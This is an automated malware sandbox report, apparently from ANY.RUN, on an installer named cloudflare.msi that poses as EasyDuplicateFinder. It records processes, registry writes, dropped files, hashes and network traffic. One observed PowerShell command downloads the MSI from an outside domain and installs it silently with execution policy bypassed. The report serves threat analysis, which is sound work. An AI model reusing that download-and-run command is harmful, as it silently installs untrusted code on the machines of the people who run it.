| download: | /cloudflare.msi |
| Full analysis: | https://app.any.run/tasks/4d5aad03-147f-41fb-a30c-700789afdb2a |
| Verdict: | Malicious activity |
| Analysis date: | December 11, 2024, 02:34:07 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-msi |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: EasyDuplicateFinder, Author: Webminds, Inc., Keywords: Installer, Comments: This installer database contains the logic and data required to install EasyDuplicateFinder., Template: Intel;1033, Revision Number: {0A54C263-3378-4839-8B1F-E728530DE644}, Create Time/Date: Wed Dec 4 16:16:08 2024, Last Saved Time/Date: Wed Dec 4 16:16:08 2024, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2 |
| MD5: | 5B4E1AE1818B630DAE4535EC96807462 |
| SHA1: | D1AD62A4B640FEF1835A4D4DD54BFB4D6DDAAFFC |
| SHA256: | CDFCFFCEFF42C4134D2E41F0BDE414ABE7A4B7E0480C8F4294EBCA0B4AB9AF24 |
| SSDEEP: | 98304:vwk4n2oZGLOFHgZne3J19ifXMDO9nyUyIOtHLKR3Q5Ex/tdKzDWNXT8doffmZsLe:jop5VNkYGxQGD5H9a+StbOy |
| .msi | | | Microsoft Installer (100) |
|---|
| CodePage: | Windows Latin 1 (Western European) |
|---|---|
| Title: | Installation Database |
| Subject: | EasyDuplicateFinder |
| Author: | Webminds, Inc. |
| Keywords: | Installer |
| Comments: | This installer database contains the logic and data required to install EasyDuplicateFinder. |
| Template: | Intel;1033 |
| RevisionNumber: | {0A54C263-3378-4839-8B1F-E728530DE644} |
| CreateDate: | 2024:12:04 16:16:08 |
| ModifyDate: | 2024:12:04 16:16:08 |
| Pages: | 200 |
| Words: | 10 |
| Software: | Windows Installer XML Toolset (3.14.1.8722) |
| Security: | Read-only recommended |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2828 | C:\WINDOWS\system32\msiexec.exe /V | C:\Windows\System32\msiexec.exe | services.exe | ||||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3984 | "C:\WINDOWS\system32\msiexec.exe" /i C:\Users\admin\AppData\Local\Temp\m.msi /qn | C:\Windows\System32\msiexec.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6280 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -command "invoke-webrequest 'https://www.kippertool.com/cloudflare.msi' -outfile ($env:temp + '\m.msi'); start-process 'msiexec.exe' -argumentlist ('/i ' + $env:TEMP + '\m.msi /qn') -wait" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6288 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6452 | "C:\Users\admin\AppData\Local\Programs\EasyDuplicateFinder\PDapp.exe" | C:\Users\admin\AppData\Local\Programs\EasyDuplicateFinder\PDapp.exe | — | msiexec.exe | |||||||||||
User: admin Company: Adobe Systems Incorporated Integrity Level: MEDIUM Description: Adobe Application Manager Version: 10.0.0.49 Modules
| |||||||||||||||
| 6920 | C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding | C:\Windows\System32\rundll32.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6956 | "C:\Windows\System32\msiexec.exe" | C:\Windows\System32\msiexec.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1639 Version: 5.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (2828) msiexec.exe | Key: | HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\RestartManager\Session0000 |
| Operation: | write | Name: | Owner |
Value: 0C0B0000AA621F3F754BDB01 | |||
| (PID) Process: | (2828) msiexec.exe | Key: | HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\RestartManager\Session0000 |
| Operation: | write | Name: | SessionHash |
Value: 0653520E501139FE83DE1C9FE223CB4075CF42FA068BC63A6D9EFF2384FA64FF | |||
| (PID) Process: | (2828) msiexec.exe | Key: | HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\RestartManager\Session0000 |
| Operation: | write | Name: | Sequence |
Value: 1 | |||
| (PID) Process: | (2828) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders |
| Operation: | write | Name: | C:\Users\admin\AppData\Roaming\Microsoft\Installer\ |
Value: | |||
| (PID) Process: | (2828) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\634DBB79B743036D349A028A1FB6CA61 |
| Operation: | write | Name: | A7D545146E407E242A9ADB692BC61BCF |
Value: C:\Users\admin\AppData\Local\Programs\EasyDuplicateFinder\FBSDataBase.bak | |||
| (PID) Process: | (2828) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\BAB4F98607C4F1C0998EDB5E921CCF3B |
| Operation: | write | Name: | A7D545146E407E242A9ADB692BC61BCF |
Value: C:\Users\admin\AppData\Local\Programs\EasyDuplicateFinder\FBSProxy.dll | |||
| (PID) Process: | (2828) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\576FF7C9D715355BE1827631723C9A4B |
| Operation: | write | Name: | A7D545146E407E242A9ADB692BC61BCF |
Value: C:\Users\admin\AppData\Local\Programs\EasyDuplicateFinder\FBSWorker.ini | |||
| (PID) Process: | (2828) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\B5AA29DEA4E51521D087DD76207DAA50 |
| Operation: | write | Name: | A7D545146E407E242A9ADB692BC61BCF |
Value: C:\Users\admin\AppData\Local\Programs\EasyDuplicateFinder\sslcert.ini | |||
| (PID) Process: | (2828) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\5D523C79F92B0C83F9406815CAD4DBA1 |
| Operation: | write | Name: | A7D545146E407E242A9ADB692BC61BCF |
Value: C:\Users\admin\AppData\Local\Programs\EasyDuplicateFinder\ssleay32.dll | |||
| (PID) Process: | (2828) msiexec.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1693682860-607145093-2874071422-1001\Components\46D62616AFDCB0603DFCB7C28B437A4C |
| Operation: | write | Name: | A7D545146E407E242A9ADB692BC61BCF |
Value: C:\Users\admin\AppData\Local\Programs\EasyDuplicateFinder\alerts\delayed.htm | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6280 | powershell.exe | C:\Users\admin\AppData\Local\Temp\m.msi | — | |
MD5:— | SHA256:— | |||
| 2828 | msiexec.exe | C:\Windows\Installer\13c16f.msi | — | |
MD5:— | SHA256:— | |||
| 6280 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF135874.TMP | binary | |
MD5:D040F64E9E7A2BB91ABCA5613424598E | SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670 | |||
| 6280 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms | binary | |
MD5:7F1CE1F64942718208F4516B3025A7E0 | SHA256:19B16CB464BE2DD4214196C08CAF149FC280CF9F3E0044ED76654526E49A1732 | |||
| 6280 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\91Y1EJZH33CWZLBFD3HI.temp | binary | |
MD5:7F1CE1F64942718208F4516B3025A7E0 | SHA256:19B16CB464BE2DD4214196C08CAF149FC280CF9F3E0044ED76654526E49A1732 | |||
| 6280 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_uibztsae.2li.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6280 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vqfcfwbl.lnc.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2828 | msiexec.exe | C:\Users\admin\AppData\Local\Programs\EasyDuplicateFinder\console\License,3.txt | text | |
MD5:72937DBD9570EB6661403121A6413914 | SHA256:E3F31E8147A3C59DAF8AC8C528EEF60999C1DFA80B8A67695266CE631661FADD | |||
| 2828 | msiexec.exe | C:\Users\admin\AppData\Local\Programs\EasyDuplicateFinder\console\images\panel-header\panel-header-default-framed-bottom-corners.gif | image | |
MD5:5B7558D963129821E2010CA78B42D181 | SHA256:763698A69EC62D3B0D9EF7DC6FB9D03FDE10892D6F07775648CC8896CF4A74EF | |||
| 2828 | msiexec.exe | C:\Users\admin\AppData\Local\Programs\EasyDuplicateFinder\console\images\tree\arrows.gif | image | |
MD5:BB27C712BBA7130CBA49CC89DCE7717B | SHA256:ACBF2F3A301EB096624280CA192C662A458D8DF32B5B366037F5EE22C251C19B | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 23.48.23.156:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
5464 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown | — | — | whitelisted |
7160 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
5064 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown | — | — | whitelisted |
7160 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
5064 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
3040 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4712 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
5064 | SearchApp.exe | 104.126.37.139:443 | www.bing.com | Akamai International B.V. | DE | whitelisted |
5064 | SearchApp.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
— | — | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
— | — | 23.48.23.156:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
— | — | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1176 | svchost.exe | 20.190.160.14:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
login.live.com |
| whitelisted |
go.microsoft.com |
| whitelisted |
www.kippertool.com |
| unknown |
arc.msn.com |
| whitelisted |